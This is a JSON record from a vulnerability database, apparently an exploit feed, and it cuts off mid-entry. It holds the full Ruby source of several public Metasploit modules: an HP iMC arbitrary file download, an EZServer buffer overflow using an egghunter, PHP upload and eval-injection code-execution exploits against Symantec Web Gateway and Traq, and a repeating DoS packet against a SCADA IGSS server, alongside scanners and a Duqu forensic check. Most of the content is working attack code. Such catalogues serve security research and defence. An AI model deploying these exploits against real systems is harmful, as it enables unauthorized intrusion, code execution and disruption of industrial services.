"id": "MSF:AUXILIARY/SCANNER/HTTP/HP_IMC_SOM_FILE_DOWNLOAD", "href": "", "type": "metasploit", "title": "HP Intelligent Management SOM FileDownloadServlet Arbitrary Download", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Intelligent Management SOM FileDownloadServlet Arbitrary Download',\n 'Description' => %q{\n This module exploits a lack of authentication and access control in HP Intelligent\n Management, specifically in the FileDownloadServlet from the SOM component, in order to\n retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully\n on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-4826' ],\n [ 'OSVDB', '98251' ],\n [ 'BID', '62898' ],\n [ 'ZDI', '13-242' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),\n OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\\\windows\\\\win.ini'])\n ])\n end\n\n def is_imc_som?\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"ServiceDesk.jsp\"),\n 'method' => 'GET'\n })\n\n if res and res.code == 200 and res.body =~ /servicedesk\\/servicedesk/i\n return true\n else\n return false\n end\n end\n\n def my_basename(filename)\n return ::File.basename(filename.gsub(/\\\\/, \"/\"))\n end\n\n def run_host(ip)\n\n unless is_imc_som?\n vprint_error(\"HP iMC with the SOM component not found\")\n return\n end\n\n vprint_status(\"Sending request...\")\n res = send_request_cgi({\n 'uri' => normalize_uri(\"servicedesk\", \"servicedesk\", \"fileDownload\"),\n 'method' => 'GET',\n 'vars_get' =>\n {\n 'OperType' => '2',\n 'fileName' => Rex::Text.encode_base64(my_basename(datastore['FILEPATH'])),\n 'filePath' => Rex::Text.encode_base64(datastore['FILEPATH'])\n }\n })\n\n if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] =~ /application\\/doc/\n contents = res.body\n fname = my_basename(datastore['FILEPATH'])\n path = store_loot(\n 'hp.imc.somfiledownloadservlet',\n 'application/octet-stream',\n ip,\n contents,\n fname\n )\n print_good(\"File saved in: #{path}\")\n else\n vprint_error(\"Failed to retrieve file\")\n return\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/hp_imc_som_file_download.rb"}, {"lastseen": "2019-11-26T19:26:12", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the EZHomeTech EZServer for versions 6.4.017 and earlier. If a malicious user sends packets containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.\n", "modified": "2017-07-24T13:26:21", "published": "2012-06-18T19:05:25", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EZSERVER_HTTP", "href": "", "type": "metasploit", "title": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'EZHomeTech EzServer Stack Buffer Overflow Vulnerability',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the EZHomeTech EZServer\n for versions 6.4.017 and earlier. If a malicious user sends packets\n containing an overly long string, it may be possible to execute a\n payload remotely. Due to size constraints, this module uses the\n Egghunter technique.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'modpr0be<modpr0be[at]spentera.com>' # Original discovery and Metasploit module\n ],\n 'References' =>\n [\n [ 'OSVDB', '83065' ],\n [ 'BID', '54056' ],\n [ 'EDB', '19266' ],\n [ 'URL', 'http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-017-stack-overflow-vulnerability/' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => 'win',\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x2e\\x2f\\x3a\",\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n [ 'EzHomeTech EzServer <= 6.4.017 (Windows XP Universal)',\n {\n 'Ret' => 0x10212779, # pop ecx # pop ebx # ret 4 - msvcrtd.dll\n 'Offset' =>\t5852\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Jun 18 2012',\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(8000)])\n\n end\n\n def exploit\n connect\n eggoptions =\n {\n :checksum => true,\n :eggtag => \"w00t\"\n }\n\n hunter = generate_egghunter(payload.encoded,payload_badchars,eggoptions)\n egg = hunter[1]\n buff = rand_text(target['Offset'] - egg.length) #junk\n buff << egg\n buff << make_nops(32)\n buff << generate_seh_record(target.ret)\n buff << make_nops(16)\n buff << hunter[0]\n buff << rand_text_alpha_upper(500)\n\n print_status(\"Triggering shellcode now...\")\n print_status(\"Please be patient, the egghunter may take a while..\")\n\n sock.put(buff)\n\n handler\n disconnect\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/ezserver_http.rb"}, {"lastseen": "2019-11-27T14:49:50", "bulletinFamily": "exploit", "description": "This module exploits a file upload vulnerability found in Symantec Web Gateway's HTTP service. Due to the incorrect use of file extensions in the upload_file() function, attackers may to abuse the spywall/blocked_file.php file in order to upload a malicious PHP file without any authentication, which results in arbitrary code execution.\n", "modified": "2019-08-02T14:48:53", "published": "2012-06-09T20:27:27", "id": "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_FILE_UPLOAD", "href": "", "type": "metasploit", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Symantec Web Gateway's\n HTTP service. Due to the incorrect use of file extensions in the upload_file()\n function, attackers may to abuse the spywall/blocked_file.php file in order to\n upload a malicious PHP file without any authentication, which results in arbitrary\n code execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Tenable Network Security, Vulnerability Discovery\n 'juan vazquez' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2012-0299' ],\n [ 'OSVDB', '82025' ],\n [ 'BID', '53443' ],\n [ 'ZDI', '12-091' ],\n [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread'\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Symantec Web Gateway 5.0.2.8', {}],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 17 2012\",\n 'DefaultTarget' => 0))\n\n self.needs_cleanup = true\n end\n\n\n def check\n res = send_request_raw({\n 'method' => 'GET',\n 'uri' => '/spywall/login.php'\n })\n\n if res and res.body =~ /\\<title\\>Symantec Web Gateway\\<\\/title\\>/\n return Exploit::CheckCode::Detected\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def on_new_session(client)\n print_warning(\"Deleting temp.php\")\n if client.type == \"meterpreter\"\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n client.fs.file.rm(\"temp.php\")\n else\n client.shell_command_token(\"rm temp.php\")\n end\n end\n\n def exploit\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n\n peer = \"#{rhost}:#{rport}\"\n payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'\n before_filename = rand_text_alpha(rand(10) + 5)\n after_filename = rand_text_alpha(rand(10) + 5)\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"true\", nil, nil, \"form-data; name=\\\"submitted\\\"\")\n post_data.add_part(before_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"before_filename\\\"\")\n post_data.add_part(after_filename, \"application/octet-stream\", nil, \"form-data; name=\\\"after_filename\\\"\")\n post_data.add_part(\"<?php #{payload.encoded} ?>\", \"image/gif\", nil, \"form-data; name=\\\"new_image\\\"; filename=\\\"#{payload_name}\\\"\")\n\n print_status(\"Sending PHP payload (#{payload_name})\")\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(uri, \"spywall/blocked_file.php\"),\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n })\n\n # If the server returns 200 and the body contains the name\n # of the default file, we assume we uploaded the malicious\n # file successfully\n if not res or res.code != 200 or res.body !~ /temp.php/\n print_error(\"File wasn't uploaded, aborting!\")\n return\n end\n\n print_status(\"Executing PHP payload (#{payload_name})\")\n # Execute our payload\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => \"#{uri}spywall/images/upload/temp/temp.php\"\n })\n\n # If we don't get a 200 when we request our malicious payload, we suspect\n # we don't have a shell, either. Print the status code for debugging purposes.\n if res and res.code != 200\n print_status(\"Server returned #{res.code.to_s}\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/symantec_web_gateway_file_upload.rb"}, {"lastseen": "2019-12-05T03:10:10", "bulletinFamily": "exploit", "description": "This module will speak whatever is in the 'TEXT' option on the victim machine.\n", "modified": "2017-07-24T13:26:21", "published": "2012-05-22T08:03:30", "id": "MSF:POST/OSX/ADMIN/SAY", "href": "", "type": "metasploit", "title": "OS X Text to Speech Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => \"OS X Text to Speech Utility\",\n 'Description' => %q{\n This module will speak whatever is in the 'TEXT' option on the victim machine.\n },\n 'References' =>\n [\n ['URL', 'http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/']\n ],\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sinn3r'],\n 'Platform' => [ 'osx' ],\n 'SessionTypes' => [ \"meterpreter\", \"shell\" ]\n ))\n\n register_options(\n [\n OptString.new('TEXT', [true, 'The text to say', \"meta-sploit\\!\"]),\n OptString.new('VOICE', [true, 'The voice to use', 'alex'])\n ])\n end\n\n\n def exec(cmd)\n tries = 0\n begin\n out = cmd_exec(cmd).chomp\n rescue ::Timeout::Error => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n rescue EOFError => e\n tries += 1\n if tries < 3\n vprint_error(\"#{@peer} - #{e.message} - retrying...\")\n retry\n end\n end\n end\n\n\n def run\n txt = datastore['TEXT']\n voice = datastore['VOICE']\n\n # Say the text\n out = cmd_exec(\"say -v \\\"#{voice}\\\" \\\"#{txt}\\\"\")\n if out =~ /command not found/\n print_error(\"The remote machine does not have the \\'say\\' command\")\n elsif not out.empty?\n print_status(out)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/admin/say.rb"}, {"lastseen": "2019-11-18T13:31:49", "bulletinFamily": "exploit", "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be brought down by sending a crafted TCP packet to port 12401. This should also work for version <= 9.0.0.1120, but that version hasn't been tested.\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-20T18:57:13", "id": "MSF:AUXILIARY/DOS/SCADA/IGSS9_DATASERVER", "href": "", "type": "metasploit", "title": "7-Technologies IGSS 9 IGSSdataServer.exe DoS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => '7-Technologies IGSS 9 IGSSdataServer.exe DoS',\n 'Description' => %q{\n The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.\n },\n 'Author' =>\n [\n 'jfa', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-4050' ],\n [ 'OSVDB', '77976' ],\n [ 'URL', 'http://www.us-cert.gov/control_systems/pdf/ICSA-11-335-01.pdf' ]\n ],\n 'DisclosureDate' => 'Dec 20 2011'\n ))\n\n register_options(\n [\n Opt::RPORT(12401),\n OptInt.new('COUNT', [ true, \"DoS IGSSdataServer.exe this many times. 0 for infinite loop.\", 1]),\n OptInt.new('SLEEP', [ true, 'Number of seconds to sleep between sending DoS packet.', 3])\n ])\n end\n\n def run\n #\n #dos = \"\\x00\\x04\\x01\\x00\\x34\\x12\\x0D\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n #dos << Rex::Text.rand_text_alpha(5014)\n #\n # I should have looked at the other MSF modules before I started doing it the hard way.\n # Lesson learn, thanks hal. Mostly borrowed from igss9_igssdataserver_rename\n #\n\n count = datastore['COUNT']\n snore = datastore['SLEEP']\n times = 1\n\n # Someone wants to keep a good service down.\n if count == 0\n count = 1\n infinite = true\n end\n\n #\n # The port seems to stay open open until someone clicks \"Close the program\".\n # Once they click \"Close the program\" (Windows 7), the port becomes unavailable.\n #\n # However, even though it's open, it doesn't seem to handle any valid requests.\n #\n while count >= 1 do\n ## Randomize the buffer size to make it a teeny tiny bit less obvious\n size = Random.new.rand(1024..5014)\n\n dos = \"\\x00\\x04\" #Funky size causes overflow\n dos << \"\\x01\\x00\\x34\\x12\"\n dos << \"\\x0D\" #Opcode\n dos << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dos << \"\\x01\" #Flag\n dos << \"\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"\n dos << Rex::Text.rand_text_alpha(size)\n\n begin\n connect\n sock.put(dos)\n print_status(\"Sending DoS packet #{times}, size: #{dos.length} ...\")\n disconnect\n rescue ::Rex::ConnectionError, Errno::ECONNREFUSED\n print_status(\"Connection refused. Someone may have clicked 'Close the program'\")\n end\n\n if infinite\n select(nil, nil, nil, snore)\n times += 1\n else\n select(nil, nil, nil, snore) if count > 1\n count -= 1\n times += 1\n end\n\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/scada/igss9_dataserver.rb"}, {"lastseen": "2019-11-18T14:59:43", "bulletinFamily": "exploit", "description": "This module sends a query to the port 264/TCP on CheckPoint Firewall-1 firewalls to obtain the firewall name and management station (such as SmartCenter) name via a pre-authentication request. The string returned is the CheckPoint Internal CA CN for SmartCenter and the firewall host. Whilst considered \"public\" information, the majority of installations use detailed hostnames which may aid an attacker in focusing on compromising the SmartCenter host, or useful for government, intelligence and military networks where the hostname reveals the physical location and rack number of the device, which may be unintentionally published to the world.\n", "modified": "2017-11-08T16:00:24", "published": "2011-12-14T12:10:30", "id": "MSF:AUXILIARY/GATHER/CHECKPOINT_HOSTNAME", "href": "", "type": "metasploit", "title": "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure',\n 'Description' => %q{\n This module sends a query to the port 264/TCP on CheckPoint Firewall-1\n firewalls to obtain the firewall name and management station\n (such as SmartCenter) name via a pre-authentication request. The string\n returned is the CheckPoint Internal CA CN for SmartCenter and the firewall\n host. Whilst considered \"public\" information, the majority of installations\n use detailed hostnames which may aid an attacker in focusing on compromising\n the SmartCenter host, or useful for government, intelligence and military\n networks where the hostname reveals the physical location and rack number\n of the device, which may be unintentionally published to the world.\n },\n 'Author' => [ 'aushack' ],\n 'DisclosureDate' => 'Dec 14 2011', # Looks like this module is first real reference\n 'References' =>\n [\n # aushack - None? Stumbled across, probably an old bug/feature but unsure.\n [ 'URL', 'http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure' ],\n [ 'URL', 'https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360' ]\n ]\n ))\n\n register_options(\n [\n Opt::RPORT(264),\n ])\n end\n\n def autofilter\n false\n end\n\n def run\n print_status(\"Attempting to contact Checkpoint FW1 SecuRemote Topology service...\")\n fw_hostname = nil\n sc_hostname = nil\n\n connect\n\n sock.put(\"\\x51\\x00\\x00\\x00\")\n sock.put(\"\\x00\\x00\\x00\\x21\")\n res = sock.get_once(4)\n if (res and res == \"Y\\x00\\x00\\x00\")\n print_good(\"Appears to be a CheckPoint Firewall...\")\n sock.put(\"\\x00\\x00\\x00\\x0bsecuremote\\x00\")\n res = sock.get_once\n if (res and res =~ /CN=(.+),O=(.+)\\./i)\n fw_hostname = $1\n sc_hostname = $2\n print_good(\"Firewall Host: #{fw_hostname}\")\n print_good(\"SmartCenter Host: #{sc_hostname}\")\n end\n else\n print_error(\"Unexpected response: '#{res.inspect}'\")\n end\n\n report_info(fw_hostname,sc_hostname)\n\n disconnect\n end\n\n # Only trust that it's real if we have a hostname. If you get a funny\n # response, it might not be what we think it is.\n def report_info(fw_hostname,sc_hostname)\n return unless fw_hostname\n host_info = {\n :host => datastore['RHOST'],\n :os_name => \"Checkpoint Firewall-1\",\n :purpose => \"firewall\"\n }\n host_info[:name] = fw_hostname\n host_info[:info] = \"SmartCenter Host: #{sc_hostname}\" if sc_hostname\n report_host(host_info)\n svc_info = {\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :proto => \"tcp\",\n :name => \"securemote\"\n }\n report_service(svc_info)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/checkpoint_hostname.rb"}, {"lastseen": "2019-11-19T23:07:55", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary command execution vulnerability in Traq 2.0 to 2.3. It's in the admincp/common.php script. This function is called in each script located in the /admicp/ directory to make sure the user has admin rights. This is a broken authorization schema because the header() function doesn't stop the execution flow. This can be exploited by malicious users to execute admin functionality, e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.\n", "modified": "2017-07-24T13:26:21", "published": "2011-12-12T21:45:19", "id": "MSF:EXPLOIT/MULTI/HTTP/TRAQ_PLUGIN_EXEC", "href": "", "type": "metasploit", "title": "Traq admincp/common.php Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Traq admincp/common.php Remote Code Execution',\n 'Description' => %q{\n This module exploits an arbitrary command execution vulnerability in\n Traq 2.0 to 2.3. It's in the admincp/common.php script.\n\n This function is called in each script located in the /admicp/ directory to\n make sure the user has admin rights. This is a broken authorization schema\n because the header() function doesn't stop the execution flow.\n This can be exploited by malicious users to execute admin functionality,\n e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'EgiX', # Vulnerability discovery and exploit\n 'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'OSVDB', '77556'],\n [ 'EDB', '18213' ],\n [ 'URL', 'http://traqproject.org/' ],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Keys' => ['php'],\n 'Space' => 4000,\n 'DisableNops' => true,\n },\n 'Platform' => ['php'],\n 'Arch' => ARCH_PHP,\n 'Targets' => [[ 'Automatic', {} ]],\n 'DisclosureDate' => 'Dec 12 2011',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The path to the Traq installation\", \"/\"]),\n ])\n end\n\n def check\n uri = normalize_uri(datastore['URI'], \"admincp\", \"login.php\")\n\n res = send_request_raw(\n {\n 'uri'=> uri\n }, 25)\n\n if (res and res.body =~ /Powered by Traq 2.[0-3]/ )\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n p = Rex::Text.encode_base64(payload.encoded)\n\n uri = normalize_uri(datastore['URI'], \"admincp\", \"plugins.php\") + \"?newhook\"\n\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_post' =>\n {\n 'plugin_id' => '1',\n 'title' => '1',\n 'execorder' => '0',\n 'hook' => 'template_footer',\n 'code' => 'error_reporting(0);eval(base64_decode($_SERVER[HTTP_CMD]));die;'\n }\n }, 25)\n\n uri = normalize_uri(datastore['URI'], \"index.php\")\n\n res = send_request_cgi(\n {\n 'method' => 'GET',\n 'uri' => uri,\n 'headers' =>\n {\n 'CMD' => p,\n 'Connection' => 'Close',\n },\n }, 25)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/traq_plugin_exec.rb"}, {"lastseen": "2019-12-11T17:35:21", "bulletinFamily": "exploit", "description": "This module searches for CVE-2011-3402 (Duqu) related registry artifacts.\n", "modified": "2017-07-24T13:26:21", "published": "2011-11-10T21:20:48", "id": "MSF:POST/WINDOWS/GATHER/FORENSICS/DUQU_CHECK", "href": "", "type": "metasploit", "title": "Windows Gather Forensics Duqu Registry Check", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather Forensics Duqu Registry Check',\n 'Description' => %q{ This module searches for CVE-2011-3402 (Duqu) related registry artifacts.},\n 'License' => MSF_LICENSE,\n 'Author' => [ 'Marcus J. Carey <mjc[at]threatagent.com>'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'References' =>\n [\n [ 'CVE', '2011-3402' ],\n [ 'URL', 'http://r-7.co/w5h7fY' ]\n ]\n ))\n end\n\n def run\n # Registry artifacts sourced from Symantec report\n artifacts =\n [\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\\"CFID\"',\n 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\CFID',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\JmiNET3\\FILTER'\n ]\n match = 0\n\n print_status(\"Searching registry on #{sysinfo['Computer']} for CVE-2011-3402 exploitation [Duqu] artifacts.\")\n\n begin\n artifacts.each do |artifact|\n (path, query) = parse_path(artifact)\n has_key = registry_enumkeys(path)\n has_val = registry_enumvals(path)\n\n if has_key.include?(query) or has_val.include?(query)\n print_good(\"#{sysinfo['Computer']}: #{path}\\\\#{query} found in registry.\")\n match += 1\n report_vuln(\n :host => session.session_host,\n :name => self.name,\n :info => \"Module #{self.fullname} detected #{path}\\\\#{query} - possible CVE-2011-3402 exploitation [Duqu] artifact.\",\n :refs => self.references,\n :exploited_at => Time.now.utc\n )\n end\n end\n rescue # Probably should do something here...\n end\n\n print_status(\"#{sysinfo['Computer']}: #{match.to_s} artifact(s) found in registry.\")\n\n end\n\n def parse_path(artifact)\n parts = artifact.split(\"\\\\\")\n query = parts[-1]\n parts.pop\n path = parts.join(\"\\\\\")\n return path, query\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/forensics/duqu_check.rb"}, {"lastseen": "2019-11-27T09:56:04", "bulletinFamily": "exploit", "description": "Scan for exposed VxWorks wdbrpc daemons\n", "modified": "2017-07-24T13:26:21", "published": "2010-08-02T05:56:26", "id": "MSF:AUXILIARY/SCANNER/VXWORKS/WDBRPC_VERSION", "href": "", "type": "metasploit", "title": "VxWorks WDB Agent Version Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::WDBRPC\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VxWorks WDB Agent Version Scanner',\n 'Description' => 'Scan for exposed VxWorks wdbrpc daemons',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://blog.metasploit.com/2010/08/vxworks-vulnerabilities.html'],\n ['US-CERT-VU', '362332']\n ]\n )\n\n register_options(\n [\n OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),\n Opt::RPORT(17185)\n ])\n end\n\n\n # Define our batch size\n def run_batch_size\n datastore['BATCHSIZE'].to_i\n end\n\n # Operate on an entire batch of hosts at once\n def run_batch(batch)\n\n begin\n udp_sock = nil\n idx = 0\n\n udp_sock = Rex::Socket::Udp.create(\n {\n 'Context' => {'Msf' => framework, 'MsfExploit' => self}\n }\n )\n add_socket(udp_sock)\n\n batch.each do |ip|\n\n begin\n udp_sock.sendto(create_probe(ip), ip, datastore['RPORT'].to_i, 0)\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused\n nil\n end\n\n if (idx % 10 == 0)\n while (r = udp_sock.recvfrom(65535, 0.01) and r[1])\n parse_reply(r)\n end\n end\n\n idx += 1\n end\n\n cnt = 0\n del = 10\n sts = Time.now.to_i\n while (r = udp_sock.recvfrom(65535, del) and r[1])\n parse_reply(r)\n\n # Prevent an indefinite loop if the targets keep replying\n cnt += 1\n break if cnt > run_batch_size\n\n # Escape after 15 seconds regardless of batch size\n break if ((sts + 15) < Time.now.to_i)\n\n del = 1.0\n end\n\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_status(\"Unknown error: #{e.class} #{e}\")\n ensure\n udp_sock.close if udp_sock\n end\n end\n\n #\n # The response parsers\n #\n def parse_reply(pkt)\n\n return if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n\n data = pkt[0]\n\n # Bare RPC response\n if data.length == 24\n ecode = data[20,4].unpack(\"N\")[0]\n emesg = \"unknown\"\n case ecode\n when 3\n # Should not be hit\n emesg = \"Device requires the VxWorks 5 WDB protocol\"\n when 5\n emesg = \"Device failed to parse the probe\"\n end\n\n print_status(\"#{pkt[1]} Error: code=#{ecode} #{emesg}\")\n return\n end\n\n if data.length < 80\n print_status(\"#{pkt[1]}: Unknown response #{data.unpack(\"H*\")[0]}\")\n return\n end\n\n res = wdbrpc_parse_connect_reply(data)\n print_good(\"#{pkt[1]}: #{res[:rt_vers]} #{res[:rt_bsp_name]} #{res[:rt_bootline]}\")\n\n report_note(\n :host => pkt[1],\n :port => datastore['RPORT'],\n :proto => 'udp',\n :type => 'vxworks.target_info',\n :data => res,\n :update => :unique\n )\n end\n\n def create_probe(ip)\n wdbrpc_request_connect(ip)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vxworks/wdbrpc_version.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-04-05T00:00:00", "published": "2006-04-05T00:00:00", "id": "SECURITYVULNS:VULN:5976", "href": 